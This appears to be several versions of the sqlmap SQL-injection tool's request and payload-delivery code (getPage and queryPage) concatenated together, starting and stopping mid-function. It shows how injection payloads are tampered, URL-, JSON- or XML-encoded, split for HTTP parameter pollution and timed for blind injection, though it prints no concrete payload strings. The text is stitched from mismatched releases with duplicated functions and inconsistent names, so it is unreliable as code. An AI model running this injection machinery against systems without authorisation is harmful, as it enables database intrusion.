headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader if HTTP_HEADER.ACCEPT not in headers: headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE if HTTP_HEADER.HOST not in headers: headers[HTTP_HEADER.HOST] = getHostHeader(url) if HTTP_HEADER.ACCEPT_ENCODING not in headers: headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers: headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTP_HEADER.CONTENT_TYPE warnMsg += "Will try to reconstruct" singleTimeWarnMessage(warnMsg) boundary = findMultipartPostBoundary(conf.data) if boundary: headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary) if auxHeaders: for key, item in auxHeaders.items(): for _ in headers.keys(): if _.upper() == key.upper(): del headers[_] headers[key] = item for key, item in headers.items(): del headers[key] headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding) url = unicodeencode(url) post = unicodeencode(post, kb.pageEncoding) if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST): method = unicodeencode(method) req = MethodRequest(url, post, headers) req.set_method(method) else: req = urllib2.Request(url, post, headers) requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()) if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: conf.cj._policy._now = conf.cj._now = int(time.time()) cookies = conf.cj._cookies_for_request(req) requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) if post is not None: if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH): requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post)) if not getRequestHeader(req, HTTP_HEADER.CONNECTION): requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION requestMsg += "\n%s" % requestHeaders if post is not None: requestMsg += "\n\n%s" % getUnicode(post) requestMsg += "\n" threadData.lastRequestMsg = requestMsg logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) conn = urllib2.urlopen(req) if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower(): kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION): kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION) # Return response object if response: return conn, None, None # Get HTTP response if hasattr(conn, 'redurl'): page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ else Connect._connReadProxy(conn)) if not skipRead else None skipLogTraffic = kb.redirectChoice == REDIRECTION.NO code = conn.redcode else: page = Connect._connReadProxy(conn) if not skipRead else None code = code or conn.code responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) status = getUnicode(conn.msg) if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing: url = extractRegexResult(META_REFRESH_REGEX, page) debugMsg = "got HTML meta refresh header" logger.debug(debugMsg) if kb.alwaysRefresh is None: msg = "sqlmap got a refresh request " msg += "(redirect like response common to login pages). " msg += "Do you want to apply the refresh " msg += "from now on (or stay on the original page)? [Y/n]" choice = readInput(msg, default="Y") kb.alwaysRefresh = choice not in ("n", "N") if kb.alwaysRefresh: if url.lower().startswith('http://'): kwargs['url'] = url else: kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url threadData.lastRedirectMsg = (threadData.lastRequestUID, page) kwargs['refreshing'] = True kwargs['get'] = None kwargs['post'] = None try: return Connect._getPageProxy(**kwargs) except SqlmapSyntaxException: pass # Explicit closing of connection object if not conf.keepAlive: try: if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() except Exception, msg: warnMsg = "problem occurred during connection closing ('%s')" % msg logger.warn(warnMsg) except urllib2.HTTPError, e: page = None responseHeaders = None try: page = e.read() if not skipRead else None responseHeaders = e.info() responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: raise except: pass finally: page = page if isinstance(page, unicode) else getUnicode(page) code = e.code kb.originalCode = kb.originalCode or code threadData.lastHTTPError = (threadData.lastRequestUID, code) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) skipLogTraffic = True if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) if e.code == httplib.UNAUTHORIZED and not conf.ignore401: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise SqlmapConnectionException(errMsg) elif e.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise SqlmapConnectionException(errMsg) else: debugMsg = "page not found (%d)" % code singleTimeLogMessage(debugMsg, logging.DEBUG) processResponse(page, responseHeaders) elif e.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: return None, None, None else: warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code]) if threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) return Connect._retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) return None, None, None else: raise SqlmapConnectionException(warnMsg) else: debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place in (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST): # payloads in GET and/or POST need to be urlencoded # throughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions therefore we need to use % as a safe char if place != PLACE.URI or (value and payload and '?' in value and value.find('?') < value.find(payload)): payload = urlencode(payload, '%', False, True) if not place in (PLACE.POST, PLACE.CUSTOM_POST) and conf.skipUrlEncode else payload value = agent.replacePayload(value, payload) elif place == PLACE.SOAP: # payloads in SOAP should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") value = agent.replacePayload(value, payload) if place: value = agent.removePayloadDelimiters(value) if place == PLACE.COOKIE and conf.cookieUrlencode: value = urlEncodeCookieValues(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value if PLACE.SOAP in conf.parameters: post = conf.parameters[PLACE.SOAP] if place != PLACE.SOAP or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in [PLACE.GET, PLACE.POST, PLACE.COOKIE]: if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or "&" variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) evaluateCode("%s='%s'" % (name, value), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if '%s=' % name in (get or ""): get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif '%s=' % name in (post or ""): post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif post: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) get = urlencode(get, limit=True) if post and place not in (PLACE.POST, PLACE.SOAP, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif not conf.skipUrlEncode and place not in (PLACE.SOAP,): post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = False warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(r"max.+connections", page or "", re.I) is not None kb.permissionFlag = re.search(r"(command|permission|access)\s*(was|is)?\s*denied", page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
def getPage(**kwargs): """ This method connects to the target url or proxy and returns the target url page content """ if conf.delay is not None and isinstance( conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) elif conf.cpuThrottle: cpuThrottle(conf.cpuThrottle) threadData = getCurrentThreadData() threadData.lastRequestUID += 1 url = kwargs.get('url', conf.url) get = kwargs.get('get', None) post = kwargs.get('post', None) method = kwargs.get('method', None) cookie = kwargs.get('cookie', None) ua = kwargs.get('ua', None) referer = kwargs.get('referer', None) host = kwargs.get('host', conf.host) direct = kwargs.get('direct', False) multipart = kwargs.get('multipart', False) silent = kwargs.get('silent', False) raise404 = kwargs.get('raise404', True) auxHeaders = kwargs.get('auxHeaders', None) response = kwargs.get('response', False) ignoreTimeout = kwargs.get('ignoreTimeout', kb.ignoreTimeout) refreshing = kwargs.get('refreshing', False) retrying = kwargs.get('retrying', False) crawling = kwargs.get('crawling', False) if not urlparse.urlsplit(url).netloc: url = urlparse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host target = reduce( lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) if not retrying: # Reset the number of connection retries threadData.retriesCount = 0 # fix for known issue when urllib2 just skips the other part of provided # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") code = None page = None requestMsg = u"HTTP request [#%d]:\n%s " % ( threadData.lastRequestUID, method or (HTTPMETHOD.POST if post else HTTPMETHOD.GET)) requestMsg += ("%s" % urlparse.urlsplit(url)[2] or "/") if not any( (refreshing, crawling)) else url responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None logHeaders = u"" skipLogTraffic = False raise404 = raise404 and not kb.ignoreNotFound # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't # support those by default url = asciifyUrl(url) # fix for known issues when using url in unicode format # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case) url = unicodeencode(url) try: if silent: socket.setdefaulttimeout(HTTP_SILENT_TIMEOUT) else: socket.setdefaulttimeout(conf.timeout) if direct: if "?" in url: url, params = url.split("?") params = urlencode(params) url = "%s?%s" % (url, params) requestMsg += "?%s" % params elif multipart: # Needed in this form because of potential circle dependency # problem (option -> update -> connect -> option) from lib.core.option import proxyHandler multipartOpener = urllib2.build_opener( proxyHandler, multipartpost.MultipartPostHandler) conn = multipartOpener.open(unicodeencode(url), multipart) page = Connect.__connReadProxy(conn) responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage( page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) return page elif any((refreshing, crawling)): pass elif target: if PLACE.GET in conf.parameters and not get: get = conf.parameters[PLACE.GET] if get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get if conf.method == HTTPMETHOD.POST and not post: for place in (PLACE.POST, PLACE.SOAP): if place in conf.parameters: post = conf.parameters[place] break elif get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Prepare HTTP headers headers = forgeHeaders({ HTTPHEADER.COOKIE: cookie, HTTPHEADER.USER_AGENT: ua, HTTPHEADER.REFERER: referer }) if kb.authHeader: headers[HTTPHEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: headers[HTTPHEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader headers[HTTPHEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE headers[ HTTPHEADER. ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if method != HTTPMETHOD.HEAD else "identity" headers[HTTPHEADER.HOST] = host or getHostHeader(url) if auxHeaders: for key, item in auxHeaders.items(): headers[key] = item for key, item in headers.items(): del headers[key] headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode( item, kb.pageEncoding) post = unicodeencode(post, kb.pageEncoding) if method: req = MethodRequest(url, post, headers) req.set_method(method) else: req = urllib2.Request(url, post, headers) requestHeaders += "\n".join( "%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items()) if not getRequestHeader(req, HTTPHEADER.COOKIE) and conf.cj: conf.cj._policy._now = conf.cj._now = int(time.time()) cookies = conf.cj._cookies_for_request(req) requestHeaders += "\n%s" % ("Cookie: %s" % ";".join( "%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) if post: if not getRequestHeader(req, HTTPHEADER.CONTENT_TYPE): requestHeaders += "\n%s: %s" % ( string.capwords(HTTPHEADER.CONTENT_TYPE), "application/x-www-form-urlencoded") if not getRequestHeader(req, HTTPHEADER.CONTENT_LENGTH): requestHeaders += "\n%s: %d" % (string.capwords( HTTPHEADER.CONTENT_LENGTH), len(post)) if not getRequestHeader(req, HTTPHEADER.CONNECTION): requestHeaders += "\n%s: close" % HTTPHEADER.CONNECTION requestMsg += "\n%s" % requestHeaders if post: requestMsg += "\n\n%s" % getUnicode(post) requestMsg += "\n" threadData.lastRequestMsg = requestMsg logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) conn = urllib2.urlopen(req) if not kb.authHeader and getRequestHeader( req, HTTPHEADER.AUTHORIZATION): kb.authHeader = getRequestHeader(req, HTTPHEADER.AUTHORIZATION) if not kb.proxyAuthHeader and getRequestHeader( req, HTTPHEADER.PROXY_AUTHORIZATION): kb.proxyAuthHeader = getRequestHeader( req, HTTPHEADER.PROXY_AUTHORIZATION) # Return response object if response: return conn, None, None # Get HTTP response if hasattr(conn, 'redurl'): page = threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ else Connect.__connReadProxy(conn) skipLogTraffic = kb.redirectChoice == REDIRECTION.NO code = conn.redcode else: page = Connect.__connReadProxy(conn) code = code or conn.code responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) status = getUnicode(conn.msg) if extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) and not refreshing: url = extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) debugMsg = "got HTML meta refresh header" logger.debug(debugMsg) if kb.alwaysRefresh is None: msg = "sqlmap got a refresh request " msg += "(redirect like response common to login pages). " msg += "Do you want to apply the refresh " msg += "from now on (or stay on the original page)? [Y/n]" choice = readInput(msg, default="Y") kb.alwaysRefresh = choice not in ("n", "N") if kb.alwaysRefresh: if url.lower().startswith('http://'): kwargs['url'] = url else: kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url threadData.lastRedirectMsg = (threadData.lastRequestUID, page) kwargs['refreshing'] = True kwargs['get'] = None kwargs['post'] = None try: return Connect.__getPageProxy(**kwargs) except sqlmapSyntaxException: pass # Explicit closing of connection object if not conf.keepAlive: try: if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() except Exception, msg: warnMsg = "problem occured during connection closing ('%s')" % msg logger.warn(warnMsg) except urllib2.HTTPError, e: page = None responseHeaders = None try: page = e.read() responseHeaders = e.info() responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage( page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: raise except: pass finally: page = page if isinstance(page, unicode) else getUnicode(page) code = e.code threadData.lastHTTPError = (threadData.lastRequestUID, code) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join( "%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in responseHeaders.items()) logHTTPTraffic( requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) skipLogTraffic = True if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) if e.code == httplib.UNAUTHORIZED: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise sqlmapConnectionException, errMsg elif e.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise sqlmapConnectionException, errMsg else: debugMsg = "page not found (%d)" % code logger.debug(debugMsg) processResponse(page, responseHeaders) elif e.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: return None, None, None else: warnMsg = "unable to connect to the target url (%d - %s)" % ( e.code, httplib.responses[e.code]) if threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ", sqlmap is going to retry the request" logger.critical(warnMsg) return Connect.__retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) return None, None, None else: raise sqlmapConnectionException, warnMsg else: debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg)
def queryPage( value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, ): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET if not auxHeaders: auxHeaders = {} raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if conf.httpHeaders: headers = dict(conf.httpHeaders) contentType = max( headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys() ) if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: kb.postUrlEncode = False conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload=payload, headers=auxHeaders) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace(">", ">").replace("<", "<") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] elif kb.postHint == POST_HINT.JSON_LIKE: payload = ( payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') ) if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] payload = ( payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') ) value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be throughly URL encoded if ( place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode ): payload = urlencode(payload, "%", False, place != PLACE.URI) # spaceplus is handled down below value = agent.replacePayload(value, payload) if conf.hpp: if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") for splitter in (urlencode(" "), " "): if splitter in payload: prefix, suffix = ( ("*/", "/*") if splitter == " " else (urlencode(_) for _ in ("*/", "/*")) ) parts = payload.split(splitter) parts[0] = "%s%s" % (parts[0], suffix) parts[-1] = "%s%s=%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1], ) for i in xrange(1, len(parts) - 1): parts[i] = "%s%s=%s%s%s" % ( DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix, ) payload = "".join(parts) for splitter in (urlencode(","), ","): payload = payload.replace( splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name")) ) value = agent.replacePayload(value, payload) else: warnMsg = "HTTP parameter pollution works only with regular " warnMsg += "GET and POST parameters" singleTimeWarnMessage(warnMsg) if place: value = agent.removePayloadDelimiters(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = ( conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value ) post = post.replace(ASTERISK_MARKER, "*") if post else post if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if value and place == PLACE.CUSTOM_HEADER: auxHeaders[value.split(",")[0]] = value.split(",", 1)[1] if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub( "%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString, ) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER variables = {} originals = {} for item in filter(None, (get, post if not kb.postHint else None)): for part in item.split(delimiter): if "=" in part: name, value = part.split("=", 1) value = urldecode(value, convall=True, plusspace=(item == post and kb.postSpaceToPlus)) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) if cookie: for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): if "=" in part: name, value = part.split("=", 1) value = urldecode(value, convall=True) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): found = False value = unicode(value) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), name, re.escape(delimiter)) if re.search(regex, (get or "")): found = True get = re.sub(regex, "\g<1>%s\g<3>" % value, get) if re.search(regex, (post or "")): found = True post = re.sub(regex, 